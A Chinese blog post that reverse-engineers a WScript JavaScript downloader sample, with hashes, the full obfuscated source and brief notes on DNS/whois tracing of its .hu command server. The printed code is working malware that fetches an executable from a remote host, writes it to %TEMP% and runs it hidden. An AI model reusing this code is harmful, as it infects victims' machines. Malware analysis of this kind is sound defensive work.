windows脚本wscript恶意程序样本逆向分析

转自:http://blog.csdn.net/microzone/article/details/52233649 作者:5t4rk

0x01 基本分析

File: inv_36f5e7.js
Size: 5942 bytes
Modified: 2016年8月17日, 18:54:00
MD5: C533B463D5598971BB32C1F743DDCC00
SHA1: C428931655EDE93A162B347525F5095FA78A454C
CRC32: 8CCB751D


0x02 恶意代码

[javascript]  view plain  copy
 print ? 在CODE上查看代码片 派生到我的代码片
  1. var oVFDA = "sdf";  
  2. var EqgwssuzDk = "i";  
  3. var CbMBFrpAenNixzr = "h";  
  4. var yZkyvpryerzo = "yau";  
  5. var OWfFyitBNfkGS = "sdf";  
  6. var EvKJKTni = "g";  
  7. var YED = "o";  
  8. var vrbkQrmZz = "a7";  
  9. var bSsgh = "d8f";  
  10. var VYq = "s";  
  11. var GqlRwYwyNRjmTXO = "7hg";  
  12. var HFaPeXFfQf = "u";  
  13. var pGJyKMNeMeSz = "dfa";  
  14. var pAHggazU = "aos";  
  15. var xeDmnRN = "kj";  
  16. var TkioFGwdqECzf = "lf";  
  17. var IvPA = "sd;";  
  18. var HGddEOIyEGlKqD = "a";  
  19. var RbAPg = "sdf";  
  20. var DweZT = "i";  
  21. var nooWw = "h";  
  22. var UOxiWTJeveTmc = "au";  
  23. var GGq = "fy";  
  24. var CZrdIAVaegI = "gsd";  
  25. var xBbxlkaid = "7o";  
  26. var xJk = "fa";  
  27. var lrrwKaQ = "8";  
  28. var tofjOwTTPqM = "gsd";  
  29. var jEkcPFPSClJy = "7h";  
  30. var dDdBSo = "au";  
  31. var MEKSkHWtXrXoq = "df";  
  32. var kRtwsMEVOvikhF = "aos";  
  33. var konDHgULOMLl = "kj";  
  34. var HwhuZGGGz = ";lf";  
  35. var QBGEkEyKTteSIFE = "sd";  
  36. var dxgAcnIaWaT = "a";  
  37. var npimEHxyw = "f";  
  38. var gzxAaIuOe = "d";  
  39. var glyIl = "is";  
  40. var vbXMnALqxJBTr = "uh";  
  41. var gfFVKDRDHlxh = "a";  
  42. var YRIeFmpyL = "y";  
  43. var Hsxi = "sdf";  
  44. var NBNVa = "7og";  
  45. var DGqwnJBYAr = "a";  
  46. var hXk = "d8f";  
  47. var YRNkBZkjVUGix = "hgs";  
  48. var nJeBUHrKmk = "7";  
  49. var BRYybtRzxHbq = "u";  
  50. var YnDofAgHjZLXTwL = "fa";  
  51. var kaJShal = "d";  
  52. var fxOc = "os";  
  53. var lKqmYlqyawDnPk = "kja";  
  54. var uNcGe = "lf";  
  55. var FLQDqhBNnjk = "d;";  
  56. var TvLqeh = "as";  
  57. var qFo = "e";  
  58. var OZGbRIQVppIwJ = "os";  
  59. var fDUqIyLO = "cl";  
  60. var KIPIrWHXsdgcjhF = "e";  
  61. var ofBSJENQVY = "Fil";  
  62. var jhmP = "o";  
  63. var shE = "eT";  
  64. var pCDcoO = "v";  
  65. var grHAZU = "Sa";  
  66. var ZwBDHN = "n";  
  67. var fzL = "o";  
  68. var sxFrtUgpGCEifOx = "i";  
  69. var HROa = "t";  
  70. var Hfuv = "i";  
  71. var HhIOUuVwmtFlbtA = "os";  
  72. var JSyyTjZmGqBZwN = "p";  
  73. var YPpqq = "te";  
  74. var uQtDLJnmFzR = "wri";  
  75. var zCnbEiZVwMiA = "pe";  
  76. var mvqWxpA = "ty";  
  77. var zzXzkEpTxO = "en";  
  78. var pFLxXyd = "p";  
  79. var MTfggvfPTyT = "o";  
  80. var KfyjmYkEKyLx = "m";  
  81. var aHQYUcaVlUQ = "rea";  
  82. var VoFg = "t";  
  83. var xTCoqvmVK = "S";  
  84. var CNfbwIDnKCJ = ".";  
  85. var uYU = "DB";  
  86. var fFDMGjDtbjfDF = "O";  
  87. var RMplJWcHEVBva = "AD";  
  88. var RNCQbKNaOibbTl = "ct";  
  89. var EMFHhMe = "je";  
  90. var GaeRpeLYCwKeEC = "eOb";  
  91. var ACHlTpc = "t";  
  92. var biNKioucc = "ea";  
  93. var aYSkIHN = "Cr";  
  94. var ICjmvAisL = "h4";  
  95. var aEr0 = "n4";  
  96. var MNnRRgRcnPquuz = "j6";  
  97. var YrkHeRxNcrvLD = "0k6";  
  98. var GkO = "hu/";  
  99. var cpEzVKLF = "l.";  
  100. var ZaQRCrwuBRfemMj = "ta";  
  101. var nXmUKyNe = "por";  
  102. var UcAIGgT = "gy";  
  103. var JRGbuChEIxq = "vje";  
  104. var UoUZIHURnralKh = "ne";  
  105. var ZkWZmYmexUdi = "w.";  
  106. var rpdWQwC = "ww";  
  107. var AOuPR = "/";  
  108. var nLpcsaMNDX = ":/";  
  109. var ZTxmNnUJLtPPC = "ttp";  
  110. var OxIajXRPSVa = "h";  
  111. var yVwM = "GET";  
  112. var yFZAdJ = "n";  
  113. var STz = "ope";  
  114. var onrpWtwXwgwLZP = "e";  
  115. var xYlXNtDRSZu = "ex";  
  116. var qPstEQFAMJHLr = "t.";  
  117. var tNixekYOZqcy = "I";  
  118. var YPOKzIhmiBkdG = "qs";  
  119. var UcOH = "2Xp";  
  120. var CMmsXjM = "m";  
  121. var QrywMxwtxaCEC = "%/";  
  122. var gIEqprqVOtlKtL = "P";  
  123. var SotUSdXog = "EM";  
  124. var WvqJvwrjlrY = "%T";  
  125. var JTbat = "s";  
  126. var PtOsPvJH = "g";  
  127. var ViiBnvJlfWUdhl = "in";  
  128. var iliEPeW = "tr";  
  129. var CmkLzTNEUf = "ntS";  
  130. var lkbyPygIhjm = "me";  
  131. var BGZCgLI = "ron";  
  132. var OQvyGswz = "nvi";  
  133. var jATLqdGXmuKKYMM = "E";  
  134. var OnCqpejicsbs = "and";  
  135. var OgwgCQuslbYE = "p";  
  136. var lWDmjSKUCrG = "Ex";  
  137. var eSfpjes = "P";  
  138. var qiIBBwTIjOPjGi = "HTT";  
  139. var jtaGAmHFz = "XML";  
  140. var VNpjktQlhr = "2.";  
  141. var vExUuOaRJUo = "ML";  
  142. var hkQYQQyQIIP = "SX";  
  143. var TkqreSKtbpOfyb = "M";  
  144. var RQwrKfLavgwJtWC = "un";  
  145. var RtQNL = "R";  
  146. var CFnecv = "l";  
  147. var hxgNojMPu = "l";  
  148. var uzMNS = "he";  
  149. var fOV = "t.S";  
  150. var xXXE = "ip";  
  151. var TdlRpCiUZgx = "cr";  
  152. var fsCFTGEb = "WS";  
  153. var yiiZpVegzCCZf = "t";  
  154. var KTtBpdR = "c";  
  155. var kePFmBQQenw = "je";  
  156. var hFarMMFi = "Ob";  
  157. var JqtZh = "e";  
  158. var WbHjmwvNlDAiIto = "t";  
  159. var vmj = "rea";  
  160. var MWhy = "C";  
  161. var lewy = new Date();  
  162. var JpCLwbk = lewy.getMilliseconds();  
  163. WScript.Sleep(10);  
  164. var lewy = new Date();  
  165. var amtDmXHniaHq = lewy.getMilliseconds();  
  166. WScript.Sleep(10);  
  167. var lewy = new Date();  
  168. var Uwj = lewy.getMilliseconds();  
  169. WScript.Sleep(10);  
  170. var lewy = new Date();  
  171. var YhfbOZ = lewy.getMilliseconds();  
  172. var kgea = amtDmXHniaHq - JpCLwbk;  
  173. var EqLhv = Uwj - amtDmXHniaHq;  
  174. var qxHRARFzWjTBRjC = YhfbOZ - Uwj;  
  175. WshShell = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](fsCFTGEb + TdlRpCiUZgx + xXXE + fOV + uzMNS + hxgNojMPu + CFnecv);  
  176. function urLi(IecREUsCLsZ){WshShell[RtQNL + RQwrKfLavgwJtWC](IecREUsCLsZ, 0, 0);}  
  177. function gxUedR(n){return TkqreSKtbpOfyb + hkQYQQyQIIP + vExUuOaRJUo + VNpjktQlhr + jtaGAmHFz + qiIBBwTIjOPjGi + eSfpjes;}  
  178. if ((kgea != EqLhv) || (EqLhv != qxHRARFzWjTBRjC)){sSJOsjbTF = WshShell[lWDmjSKUCrG + OgwgCQuslbYE + OnCqpejicsbs + jATLqdGXmuKKYMM + OQvyGswz + BGZCgLI + lkbyPygIhjm + CmkLzTNEUf + iliEPeW + ViiBnvJlfWUdhl + PtOsPvJH + JTbat](WvqJvwrjlrY + SotUSdXog + gIEqprqVOtlKtL + QrywMxwtxaCEC) + CMmsXjM + UcOH + YPOKzIhmiBkdG + tNixekYOZqcy + qPstEQFAMJHLr + xYlXNtDRSZu + onrpWtwXwgwLZP;  
  179.  VcmpOhXAkWS = gxUedR(0);  
  180.  fgRtFR = WScript.CreateObject(VcmpOhXAkWS);  
  181. fgRtFR[STz + yFZAdJ](yVwM, OxIajXRPSVa + ZTxmNnUJLtPPC + nLpcsaMNDX + AOuPR + rpdWQwC + ZkWZmYmexUdi + UoUZIHURnralKh + JRGbuChEIxq + UcAIGgT + nXmUKyNe + ZaQRCrwuBRfemMj + cpEzVKLF + GkO + YrkHeRxNcrvLD + MNnRRgRcnPquuz + aEr0 + ICjmvAisL, false);  
  182. fgRtFR.send();  
  183. while (fgRtFR.readystate < 4 ) {WScript.Sleep(1000)};  
  184. wrZOz = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](RMplJWcHEVBva + fFDMGjDtbjfDF + uYU + CNfbwIDnKCJ + xTCoqvmVK + VoFg + aHQYUcaVlUQ + KfyjmYkEKyLx);  
  185. wrZOz[STz + yFZAdJ]();  
  186. wrZOz[mvqWxpA + zCnbEiZVwMiA] = 1;  
  187. wrZOz[uQtDLJnmFzR + YPpqq](fgRtFR.ResponseBody);  
  188. wrZOz[JSyyTjZmGqBZwN + HhIOUuVwmtFlbtA + Hfuv + HROa + sxFrtUgpGCEifOx + fzL + ZwBDHN] = 0;  
  189. wrZOz[grHAZU + pCDcoO + shE + jhmP + ofBSJENQVY + KIPIrWHXsdgcjhF](sSJOsjbTF, 2 );  
  190. wrZOz[fDUqIyLO + OZGbRIQVppIwJ + qFo]();  
  191. urLi(sSJOsjbTF);  
  192. kgea = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + amtDmXHniaHq + JpCLwbk;  
  193. EqLhv = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + Uwj + amtDmXHniaHq;  
  194. qxHRARFzWjTBRjC = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + YhfbOZ + Uwj;  
  195. }  


0x03 还原后的代码


其实编码并不复杂,只是进行了大量的代码数据和字符串替换。

主要功能如下


标准的恶意程序下载者,不懂下载者的可以百度。


关键位置标记,hu.域名。来自匈牙利的国家一级域名。看来是个国外黑客。


0x04 信息追踪


dns查询


whois查询




0x05  其他信息


           搜索有没有其它已披露恶意CC服务器,发现其还有勒索病毒回连。


0x06 参考知识点


http://www.jb51.net/shouce/xmlhttp/
http://www.jb51.net/article/50712.htm

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值